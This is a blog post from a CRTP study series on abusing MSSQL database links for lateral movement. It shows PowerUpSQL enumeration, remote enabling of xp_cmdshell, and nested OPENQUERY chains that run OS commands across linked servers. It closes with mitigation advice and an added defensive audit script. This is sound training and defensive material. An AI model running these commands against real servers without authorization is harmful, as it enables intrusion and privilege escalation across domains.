The Road to CRTP Cert - Part 30


Dineshkumaar R

Introduction

Dear Professionals, welcome back to “The Road to CRTP Blog” series! In our previous post, we explored Privilege Escalation Across Domain Trusts using ADCS. In this post, we shift our attention to Trust Abuse via MSSQL Servers.

Let’s continue this exciting journey towards CRTP success!

Trust Abuse via MSSQL Servers

Microsoft SQL (MSSQL) servers are widely used in enterprise environments, often deployed across Windows domains. Their integration with Active Directory makes them a common target for lateral movement during penetration tests and red team engagements. Because domain users can be mapped to different database roles and logins, attackers can abuse those permissions for privilege escalation and network traversal.

For enumeration and exploitation, we will leverage PowerUpSQL, a powerful tool that helps identify misconfigurations and execute attacks on SQL Servers. You can find the tool here: PowerUpSQL.

Discovery: Finding SQL Servers in the Domain

Before exploiting MSSQL servers, we need to identify their presence in the domain.

SPN Scanning (Finding MSSQL Instances)

SQL Servers register Service Principal Names (SPNs) in Active Directory. We can leverage this to identify SQL instances:

Get-SQLInstanceDomain

Check Accessibility

Once MSSQL instances are found, we check their accessibility:

Get-SQLConnectionTestThreaded

To test all discovered instances for accessibility:

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Gather Additional Information

To retrieve detailed information about each SQL Server:

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Abusing Database Links for Lateral Movement

Understanding Database Links

SQL Database Links allow one SQL Server to access external data sources, including:

Other SQL Servers (linked servers)

OLE DB data sources (external databases)

When database links exist between SQL servers, an attacker can execute stored procedures across them, even across forest trusts, enabling further compromise.

Enumerating Database Links

Finding Linked Servers

Use PowerUpSQL to check for linked SQL servers:

Get-SQLServerLink -Instance mssql -Verbose

Or, manually via SQL query:

SELECT * FROM master..sysservers;

Enumerating Database Links via Queries

The OPENQUERY() function executes a pass-through query on a linked server and returns the result set locally:

SELECT * FROM openquery("sql1",'SELECT * FROM master..sysservers');

To enumerate multiple linked servers, we use PowerUpSQL:

Get-SQLServerLinkCrawl -Instance mssql -Verbose

Chaining Linked Server Queries

If SQL Servers are linked in a chain, we can query deeper:

SELECT * FROM openquery("sql1",'SELECT * FROM openquery("mgmt",''SELECT * FROM master..sysservers'')');

Executing Commands via Database Links

Enabling xp_cmdshell for OS Command Execution

To execute system commands, xp_cmdshell must be enabled. If it’s disabled on the linked server but the RPC Out option is enabled on the link, we can enable xp_cmdshell remotely:

EXECUTE('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT "eu-sql";

Executing Commands on a Target SQL Server

Using PowerUpSQL, we can run OS commands remotely:

Get-SQLServerLinkCrawl -Instance mssql -Query "EXEC master..xp_cmdshell 'whoami'" -QueryTarget essos-sql

Executing Nested Queries for Deep Lateral Movement

If there are multiple linked SQL servers in a chain, we can execute OS commands across them:

SELECT * FROM openquery("sql1",'SELECT * FROM openquery("mgmt",''SELECT * FROM openquery("essos-sql.essos.local",''''SELECT @@version as version; EXEC master..xp_cmdshell "powershell whoami"'''')'')');

Conclusion

SQL Server misconfigurations, especially Database Links and xp_cmdshell, offer strong opportunities for lateral movement in Windows domains. By leveraging tools like PowerUpSQL, attackers can exploit these weaknesses to move across networks and escalate privileges. Organizations should regularly audit SQL Server permissions, disable unnecessary features, and monitor unusual activity to prevent such abuses.

Mitigation Recommendations:

✅ Restrict xp_cmdshell usage.

✅ Monitor linked server configurations.

✅ Use strong authentication for MSSQL accounts.

✅ Regularly audit domain user roles in SQL Server.

✅ Apply least privilege principle to database users.
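As an added example that is not from the original post or from PowerUpSQL, the following T-SQL audits the two settings this post relies on (xp_cmdshell and linked servers with RPC Out) and shows how to switch them off where they are not needed. The linked-server name eu-sql is borrowed from the post and stands in for whatever the audit query returns.

```sql
-- Added example (not from the original post or PowerUpSQL): audit the
-- settings this post abuses, then remediate them where not required.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means a sysadmin (or any
--    login reaching the instance as one via a link) can run OS commands
--    as the SQL Server service account.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ad Hoc Distributed Queries');

-- 2. Linked servers and their login mappings. is_rpc_out_enabled = 1 is
--    what lets EXECUTE(...) AT "linked-server" run on the remote instance;
--    is_data_access_enabled = 1 is what lets OPENQUERY pass queries through.
--    A mapping row with local_principal_id = 0 applies to every local login;
--    uses_self_credential = 0 plus a fixed remote_name means all of them
--    arrive at the remote server as that one account.
SELECT s.name                    AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ll.local_principal_id,
       ll.uses_self_credential,
       ll.remote_name            AS mapped_remote_login
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 3. Remediation on instances that do not need these features.
--    xp_cmdshell is an advanced option, so it must be exposed first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 'eu-sql' is the linked-server name used earlier in the post; substitute
-- the names returned by query 2. Disabling RPC Out blocks EXECUTE ... AT.
EXEC sp_serveroption @server = N'eu-sql', @optname = N'rpc out', @optvalue = N'false';
-- Where the link is only needed as a catalog entry, cut data access too,
-- which blocks OPENQUERY and four-part-name queries through it.
EXEC sp_serveroption @server = N'eu-sql', @optname = N'data access', @optvalue = N'false';
```

Run the two SELECTs on every instance returned by Get-SQLInstanceDomain; a link whose mapping lands every login on a remote sysadmin is the configuration the link-crawl in this post depends on.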

By addressing these issues, organizations can significantly reduce their attack surface and prevent unauthorized access through MSSQL abuse.

Thank you for taking the time to read my blog. Wishing you a joyful learning experience ahead!
